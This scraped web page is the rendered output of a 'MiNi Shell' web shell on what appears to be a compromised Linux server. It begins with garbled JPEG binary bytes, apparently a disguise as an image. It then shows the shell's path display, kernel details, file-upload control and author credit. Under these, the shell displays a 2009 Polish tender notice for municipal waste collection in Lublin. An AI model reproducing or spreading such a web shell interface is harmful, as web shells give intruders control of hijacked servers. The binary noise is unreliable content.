JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/2338-N-2009.html

<p class="kh_header"><b>Lublin: Usługi  w zakresie odbierania odpadów komunalnych z terenu nieruchomości będących własnością Gminy Miasto Lublin i o własności mieszanej oraz własności osób fizycznych, pozostających w zarządzie ZNK w rejonie I.</b><br>
<b>Numer ogłoszenia: 2338 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Nieruchomości Komunalnych , ul. Grodzka 12, 20-112 Lublin, woj. lubelskie, tel. 081 5371200, faks 081 5371201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.znk.futuro.net.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi  w zakresie odbierania odpadów komunalnych z terenu nieruchomości będących własnością Gminy Miasto Lublin i o własności mieszanej oraz własności osób fizycznych, pozostających w zarządzie ZNK w rejonie I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  są usługi polegające na :
1.    odbieraniu odpadów komunalnych:
-	frakcji mokrej, kod 20 03 01;
-	frakcji suchej, kod 20 01 99;
-	szkła opakowaniowego, kod 20 01 02;
-	ulegających biodegradacji - liście, gałęzie, kod 20 02 01;
-	wielkogabarytowych, kod 20 03 07;
-	zużytego sprzętu elektrycznego i elektronicznego, kod 20 01 23*, 20 01 35*, 20 01 36;
-	gruzu i innych odpadów z budowy, kod 17 01 01 i 17 01 07.
2.     ustawieniu na terenie nieruchomości pojemników do zbierania odpadów frakcji mokrej, frakcji suchej, szkła opakowaniowego, ulegających biodegradacji, gruzu i innych odpadów z budowy.
3.     wywożeniu ze swoich pojemników odpadów frakcji mokrej, frakcji suchej, szkła opakowaniowego oraz wielkogabarytowych i zużytego sprzętu elektrycznego             i elektronicznego, z określoną częstotliwością. 
4.    wywożeniu odpadów ulegających biodegradacji, gruzu i innych odpadów z budowy kontenerami KP7, na zlecenie administratora lub innej osoby uprawnionej przez zamawiającego.
5.    nieodpłatnej wymianie pojemników w razie zniszczenia  lub złego stanu sanitarno - estetycznego  w terminie nie dłuższym jak 2 tygodnie od powstania takiej konieczności.
Usługa ma być świadczona w rejonie I, szczegółowo określonym w załączniku nr 2 do   specyfikacji. Zakres zamówienia obejmuje 24 budynki i 25 garaży..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.32.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium 	w wysokości      2300,00  zł  (słownie złotych: dwa tysiące trzysta  00/100 )
Wadium należy wnieść w terminie do dnia 16.01.2009 r. do godz. 12:15<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
a)prowadzą działalność gospodarczą na zasadach określonych w przepisach ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (tekst jednolity: Dz.U. z 2007 r. nr 155 poz. 1095,  z późn. zmianami);
b)posiadają zezwolenie obejmujące przedmiot zamówienia tj.:
-	na odbieranie odpadów komunalnych od właścicieli nieruchomości
-	na zbieranie i transport odpadów
wydane przez Prezydenta Miasta Lublin (Zarządzenie nr 496/2006 Prezydenta Miasta Lublin z dn. 16 listopada 2006 r. w sprawie wymagań jakie powinien spełniać przedsiębiorca ubiegający się o uzyskanie zezwolenia na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości oraz opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych na terenie miasta Lublin);
c)posiadają potwierdzenie wydane przez Głównego Inspektora Ochrony Środowiska   o nadaniu numeru rejestrowego w związku z wpisem do rejestru zbierających zużyty sprzęt o kodach określonych w przedmiocie zamówienia.
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
a)posiadają odpowiednią ilość pojemników i kontenerów zapewniających możliwość zbierania odpadów w sposób zgodny z § 12 Uchwały nr 963/XXXIX/2006 Rady Miasta z dnia 23 marca 2006 r. w sprawie regulaminu utrzymania czystości i porządku na terenie miasta Lublin oraz ich opróżniania z częstotliwością określoną w § 13 wspomnianego regulaminu;
b)spełniają wymagania określone w Zarządzeniu Nr 496/2006 Prezydenta Miasta Lublin z dnia 16 listopada 2006 r. w sprawie wymagań, jakie powinien spełniać przedsiębiorca ubiegający się o uzyskanie zezwolenia na prowadzenie działalności  w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości oraz opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych. 
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
- posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej. Minimalną sumę gwarancyjną ubezpieczenia określa się na kwotę 50.000 zł.
4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

W przypadku wspólnego ubiegania się o udzielenie zamówienia  Wykonawcy powinni posiadać zezwolenie, o którym mowa w pkt. 1b stosownie do zakresu przedmiotu zamówienia realizowanego przez każdego z nich oraz ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy. 
Wymogi dotyczące Wykonawcy samodzielnie występującego stosuje się odpowiednio do Wykonawców występujących wspólnie. 
Ocena spełnienia w/w warunków  nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 8 specyfikacji. Zamawiający sprawdzi ich kompletność i prawidłowość..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy dostarczą:
1. Pisemne oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu 
2. Aktualny  odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert.
3.Zezwolenie na odbieranie odpadów komunalnych od właścicieli nieruchomości, zezwolenie na zbieranie i transport odpadów objętych przedmiotem zamówienia określonym w pkt 1 ppkt 1.1 specyfikacji.
4.Potwierdzenie wydane przez Głównego Inspektora Ochrony Środowiska o nadaniu numeru rejestrowego w związku z wpisem do rejestru zbierających zużyty sprzęt o kodach określonych w przedmiocie zamówienia.
5.Oświadczenie Wykonawcy o dysponowaniu sortownią frakcji suchej, kompostownią odpadów, miejscem magazynowania odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego oraz zakładu przetwórstwa gruzu o możliwościach zagospodarowania porównywalnych z wielkością strumieni poszczególnych rodzajów odpadów.    
6.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7.Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.Aktualną  informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Prawo zamówień publicznych wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku podmiotów zbiorowych aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy p.z.p. wystawioną  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.Oświadczenie o tym, że samochody wykorzystywane do świadczenia usługi będą oznakowane i o  posiadaniu przez  pracowników wykonujących przedmiot zamówienia jednolitego umundurowania z krótkim jego opisem.
10. Oświadczenie, że Wykonawca będzie dysponował w okresie obowiązywania umowy pojemnikami  ażurowymi i workami z tworzyw sztucznych.
11.Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Minimalną sumę gwarancyjną ubezpieczenia określa się na kwotę 50.000,- zł.  W przypadku podmiotów występujących wspólnie warunki dotyczące polisy OC mogą być spełnione łącznie.
12.Dodatkowo poza dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, na podstawie art. 23 ustawy Prawo zamówień publicznych (np. konsorcjum), do oferty winno być dołączone pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego lub umowa regulująca współpracę podmiotów występujących wspólnie, która wskazuje pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia.
13. W przypadku zamiaru korzystania z potencjału technicznego i osób zdolnych do wykonania zamówienia udostępnionych przez inny podmiot Wykonawca złoży wraz z ofertą:
-	pisemne zobowiązanie tego podmiotu do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów wymienionych w punktach  2 i 6 do 8  składają dokument lub dokumenty wymienione w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. 87 poz. 605 z późn. zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.znk.futuro.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Nieruchomości Komunalnych , ul, Grodzka 12, 20-112 Lublin, pokój 203.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 12:15, miejsce: sekretariat (pokój nr 100) Zarządu Nieruchomości Komunalnych, ul. Grodzka 12, 20-112 Lublin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com